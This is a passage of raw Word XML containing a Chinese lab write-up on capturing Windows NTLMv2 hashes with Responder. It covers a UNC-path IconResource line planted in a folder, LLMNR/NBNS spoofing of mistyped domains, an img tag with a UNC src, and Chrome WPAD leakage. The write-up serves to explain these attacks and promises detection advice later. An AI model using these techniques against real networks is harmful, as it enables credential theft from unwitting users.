        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>IconResource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>=\\win-test\test\SHELL32.dll,2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>随后就得想办法将这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹放入受害主机，这个就要看大家的脑洞了，这里只验证可行性。当其打开这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹的时候，受害主机就会去请求图标资源，效果也是类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议，会将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NTLM v2 hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发送至正在监听的机器如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>可以看到会瞬间刷屏</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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74604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144106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16081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1292143390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3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="header-n79"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三：通过错误域名获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:t>还有通过</w:t>
      </w:r>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t>协议来骗取</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>值的功能，由于</w:t>
      </w:r>
      <w:r>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:t>默认会尝试通过</w:t>
      </w:r>
      <w:r>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:t>协议解析域名，那么</w:t>
      </w:r>
      <w:r>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:t>输入错误域名后会被欺骗并解析到</w:t>
      </w:r>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>，随后</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>会要求</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:t>认证，受害机器就会发送</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="header-n81"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要交互获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值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>进行下测试，开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问一个不存在的域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，会弹出认证框，输入凭证后即可获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值：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27792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11332369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69812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11343642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继续测试其他浏览器是否如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一样弹出认证框：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>chrome</w:t>
      </w:r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03375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32347395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t>firefox</w:t>
      </w:r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3283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408462785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可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不会弹出认证框、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的认证框则不太会让人想到输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>windwos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>凭据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="header-n91"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不需要交互获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值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>虽然上述方式可以，但是浏览器中一个网站要求</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>windwos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码还是显得不常见，那么能不能自动化一点呢？猜想也许可以直接通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>页面嵌入网络共享资源，使受害机器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>直接请求资源，由于资源中的主机名不存在，会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>欺骗，随后获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NTLM V2hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值，完成连环攻击，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类似于只要手抖输错域名就会被获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值，不需要交互。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>首先在</w:t>
      </w:r>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>上开启一个</w:t>
      </w:r>
      <w:r>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:t>服务，修改</w:t>
      </w:r>
      <w:r>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:t>中嵌入一个</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>标签，并将</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>写为</w:t>
      </w:r>
      <w:r>
        <w:t>UNC</w:t>
      </w:r>
      <w:r>
        <w:t>路径格式，这里主机名写的是不存在的主机</w:t>
      </w:r>
      <w:r>
        <w:t>win-http</w:t>
      </w:r>
      <w:r>
        <w:t>，启动</w:t>
      </w:r>
      <w:r>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:t>然后开启</w:t>
      </w:r>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:t>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158561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11220254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win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浏览器，尝试访问一个不存在的域名，而后查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现已获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值：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29466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10440488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194149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21044336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但是经测试发现，这种共享资源获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值方式对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并不适用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="header-n99"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的小彩蛋</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也许看下来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在这方面的安全性比较好，但是在测试过程中发现了一个只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在的问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WPAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启用的情况下（默认启用），开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>机器上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>仅需打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就会被获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，且其他如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>均不会有这个问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>WPAD</w:t>
      </w:r>
      <w:r>
        <w:t>默认启用：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03668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409122184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</w:pPr>
      <w:r>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2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704504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hyh\Documents\渗透测试实战笔记\杂项\技术文章.assets\image-2020120409090184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6" w:rsidRDefault="003445E6">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为什么会出现这个情况？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WPAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy Auto-Discovery Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:t>代理自动发现协议，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>猜想</w:t>
      </w:r>
      <w:r>
        <w:t>chrome</w:t>
      </w:r>
      <w:r>
        <w:t>是因为自己的某些</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>功能需要代理，所以在</w:t>
      </w:r>
      <w:r>
        <w:t>WPAD</w:t>
      </w:r>
      <w:r>
        <w:t>开启的情况下会自动查找代理服务器，并通过</w:t>
      </w:r>
      <w:r>
        <w:t>llmnr</w:t>
      </w:r>
      <w:r>
        <w:t>广播出去，并在这个过程中被</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>欺骗，随后同样被要求进行</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:t>认证。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A9072E" w:rsidRDefault="00A9072E">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="header-n107"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003445E6" w:rsidRDefault="00007BE2" w:rsidP="00D10F3F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="header-n108"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>总结一下，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reponder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的主要作用其实就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议欺骗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”+“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模拟服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，先通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NBNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLMNR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MDNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议进行欺骗，将流量转到本机，再通过服务交互来获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>值，本文仅仅从技术可行性出发介绍了几种利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>骗取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NTLMv2 hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的方法，并没有考虑太多实际环境中的可行性，大家可以根据自己需要进行深入。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>下篇文章将会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:t>其他用法以及检测</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="header-n111"/>
      <w:bookmarkStart w:id="19" w:name="header-n119"/>
      <w:bookmarkStart w:id="20" w:name="header-n120"/>
      <w:bookmarkStart w:id="21" w:name="header-n125"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:sectPr w:rsidR="003445E6" w:rsidSect="00D51E6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1E75" w:rsidRDefault="00BB1E75">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00BB1E75" w:rsidRDefault="00BB1E7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1E75" w:rsidRDefault="00BB1E75">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00BB1E75" w:rsidRDefault="00BB1E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A454B4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="128CC10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>
    <w:nsid w:val="2C1AE401"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8152B3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>
    <w:nsid w:val="71315DCA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1F69D1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90D07"/>
    <w:rsid w:val="00007BE2"/>
    <w:rsid w:val="00011C8B"/>
    <w:rsid w:val="000167E4"/>
    <w:rsid w:val="003445E6"/>
    <w:rsid w:val="004E29B3"/>
    <w:rsid w:val="00590D07"/>
    <w:rsid w:val="005F2104"/>
    <w:rsid w:val="00784D58"/>
    <w:rsid w:val="008D6863"/>
    <w:rsid w:val="00A9072E"/>
    <w:rsid w:val="00B86B75"/>
    <w:rsid w:val="00BB1E75"/>
    <w:rsid w:val="00BC48D5"/>
    <w:rsid w:val="00C36279"/>
    <w:rsid w:val="00D10F3F"/>
    <w:rsid w:val="00D51E6E"/>
    <w:rsid w:val="00E315A3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D51E6E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D51E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rsid w:val="00D51E6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rsid w:val="00D51E6E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D51E6E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Compact">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00D51E6E"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00D51E6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rsid w:val="00D51E6E"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D51E6E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
